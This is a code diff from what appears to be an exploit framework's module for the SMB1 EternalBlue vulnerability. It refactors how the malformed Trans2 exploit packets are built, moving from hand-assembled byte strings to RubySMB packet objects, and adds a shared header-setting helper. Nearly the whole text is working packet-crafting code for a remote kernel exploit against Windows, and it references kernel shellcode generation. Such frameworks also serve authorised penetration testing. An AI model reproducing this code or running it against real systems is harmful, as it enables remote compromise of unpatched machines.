@@ -417,42 +417,26 @@ def make_smb2_payload_body_packet(kernel_user_payload)
417417 # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
418418 def make_smb1_trans2_exploit_packet ( tree_id , user_id , type , timeout )
419419 timeout = ( timeout * 0x10 ) + 3
420+ timeout_value = "\x35 \x00 \xd0 " + timeout . chr
420421
421- pkt = ""
422- pkt << "\x00 " # Session message
423- pkt << "\x00 \x10 \x35 " # length
424- pkt << "\xff SMB" # SMB1
425- pkt << "\x33 " # Trans2 request
426- pkt << "\x00 \x00 \x00 \x00 " # NT SUCCESS
427- pkt << "\x18 " # Flags
428- pkt << "\x07 \xc0 " # Flags2
429- pkt << "\x00 \x00 " # PID High
430- pkt << "\x00 \x00 \x00 \x00 " # Signature1
431- pkt << "\x00 \x00 \x00 \x00 " # Signature2
432- pkt << "\x00 \x00 " # Reserved
433- pkt << [ tree_id ] . pack ( "S>" ) # TreeID
434- pkt << "\xff \xfe " # PID
435- pkt << [ user_id ] . pack ( "S>" ) # UserID
436- pkt << "\x40 \x00 " # MultiplexIDs
437-
438- pkt << "\x09 " # Word Count
439- pkt << "\x00 \x00 " # Total Param Count
440- pkt << "\x00 \x10 " # Total Data Count
441- pkt << "\x00 \x00 " # Max Param Count
442- pkt << "\x00 \x00 " # Max Data Count
443- pkt << "\x00 " # Max Setup Count
444- pkt << "\x00 " # Reserved
445- pkt << "\x00 \x10 " # Flags
446- pkt << "\x35 \x00 \xd0 " # Timeouts
447- pkt << timeout . chr
448- pkt << "\x00 \x00 " # Reserved
449- pkt << "\x00 \x10 " # Parameter Count
450-
451- #pkt << "\x74\x70" # Parameter Offset
452- #pkt << "\x47\x46" # Data Count
453- #pkt << "\x45\x6f" # Data Offset
454- #pkt << "\x4c" # Setup Count
455- #pkt << "\x4f" # Reserved
422+ packet = RubySMB ::SMB1 ::Packet ::Trans2 ::Request . new
423+ packet = set_smb1_headers ( packet , tree_id , user_id )
424+
425+ # The packets are labeled as Secondary Requests but are actually structured
426+ # as normal Trans2 Requests for some reason. We shall similarly cheat here.
427+ packet . smb_header . command = RubySMB ::SMB1 ::Commands ::SMB_COM_TRANSACTION2_SECONDARY
428+
429+ packet . parameter_block . flags . read ( "\x00 \x10 " )
430+ packet . parameter_block . timeout . read ( timeout_value )
431+
432+ packet . parameter_block . word_count = 9
433+ packet . parameter_block . total_data_count = 4096
434+ packet . parameter_block . parameter_count = 4096
435+
436+ nbss = "\x00 \x00 \x10 \x35 "
437+ pkt = packet . to_binary_s
438+ pkt = pkt [ 0 , packet . parameter_block . parameter_offset . abs_offset ]
439+ pkt = nbss + pkt
456440
457441 if type == :eb_trans2_exploit
458442 vprint_status ( "Making :eb_trans2_exploit packet" )
@@ -519,11 +503,7 @@ def make_smb1_nt_trans_packet(tree_id, user_id)
519503 # our values here.
520504 packet . data_block . enable_padding = false
521505
522- packet . smb_header . flags2 . read ( "\x07 \xc0 " )
523- packet . smb_header . tid = tree_id
524- packet . smb_header . uid = user_id
525- packet . smb_header . pid_low = 65279
526- packet . smb_header . mid = 64
506+ packet = set_smb1_headers ( packet , tree_id , user_id )
527507
528508 packet . parameter_block . max_setup_count = 1
529509 packet . parameter_block . total_parameter_count = 30
@@ -646,6 +626,19 @@ def make_kernel_shellcode
646626
647627 end
648628
629+ # Sets common SMB1 Header values used by the various
630+ # packets in the exploit.
631+ #
632+ # @rturn [RubySMB::GenericPacket] the modified version of the packet
633+ def set_smb1_headers ( packet , tree_id , user_id )
634+ packet . smb_header . flags2 . read ( "\x07 \xc0 " )
635+ packet . smb_header . tid = tree_id
636+ packet . smb_header . uid = user_id
637+ packet . smb_header . pid_low = 65279
638+ packet . smb_header . mid = 64
639+ packet
640+ end
641+
649642
650643 # Returns the value to be passed to SMB clients for
651644 # the password. If the user hs not supplied a password
0 commit comments